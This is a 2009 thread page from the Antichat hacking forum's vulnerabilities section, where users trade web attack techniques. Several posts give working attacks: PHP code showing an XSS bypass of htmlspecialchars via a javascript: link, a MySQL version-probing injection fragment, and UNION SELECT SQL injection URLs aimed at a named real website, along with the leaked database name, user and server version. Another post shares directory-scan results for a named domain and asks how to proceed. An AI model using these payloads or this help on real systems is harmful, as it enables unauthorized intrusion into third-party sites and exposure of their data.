ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10101  
Старый 12.11.2009, 21:28
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.

Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.

Последний раз редактировалось Ins3t; 12.11.2009 в 21:31..
 
Ответить с цитированием

  #10102  
Старый 12.11.2009, 21:29
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Цитата:
Сообщение от Krist_ALL  
http://security-digger.org/

или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392
ну вот просканировал я директори, получилось вот что:
Found [403]: mtl-consultants.com/.htaccess
Found [403]:site.com/.htaccess~
Found [403]: site.com/.htpasswd
Found [403]: site.com/.htpasswd~
Found [200]: .com/_notes/
Found [403]: .com/cgi-bin/
Found [403]: .com/cgi-sys/
Found [301]: .com/cpanel/
Found [200]: .com/email/
Found [301]: .com/images
Found [403]: .com/mailman
Found [301]: .com/pipermail
Found [301]: .com/webmail
Found [403]: .com/~root

а что дальше? объясни плиз
 
Ответить с цитированием

  #10103  
Старый 12.11.2009, 21:31
Аватар для Aртем
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от Ins3t  
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter
 
Ответить с цитированием

  #10104  
Старый 12.11.2009, 21:31
Аватар для vorona
vorona
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
Провел на форуме:
390301

Репутация: 3
По умолчанию

как обходится htmlspecialchars??
 
Ответить с цитированием

  #10105  
Старый 12.11.2009, 21:33
Аватар для fng
fng
Новичок
Регистрация: 12.11.2009
Сообщений: 20
Провел на форуме:
32270

Репутация: 0
По умолчанию

n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
 
Ответить с цитированием

  #10106  
Старый 12.11.2009, 21:37
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о
1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:

PHP код:
<?php 
$a 
"javascript:document.write('<script>alert(0)</script>');";
$data htmlspecialchars($a); 
echo 
"<a href=$data>Tikni</a>";
?>
просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте

Последний раз редактировалось Pashkela; 12.11.2009 в 21:48..
 
Ответить с цитированием

  #10107  
Старый 12.11.2009, 21:37
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от [x60]unu  
Ну как бэ от ордер бай не всегда польза есть, часто приходится в ручную все гонять
ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит
+and+substring(version(),1,1)=4
 
Ответить с цитированием

  #10108  
Старый 12.11.2009, 21:38
Аватар для LzD
LzD
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533

Репутация: 43
По умолчанию

Цитата:
Сообщение от fng  
n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2--
[+] Current Database : nsider
[+] Database User : nsider_mysql@apache2-fungi.pistons.dreamhost.com
[+] MySQL Version : 5.0.67-userstats-log
 
Ответить с цитированием

  #10109  
Старый 12.11.2009, 21:39
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

2fng,

Код:
http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens
вывод в свойставх картинки
 
Ответить с цитированием

  #10110  
Старый 12.11.2009, 21:45
Аватар для fng
fng
Новичок
Регистрация: 12.11.2009
Сообщений: 20
Провел на форуме:
32270

Репутация: 0
По умолчанию

спасибо парни, вроде так же делал, не заметил может вывод...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ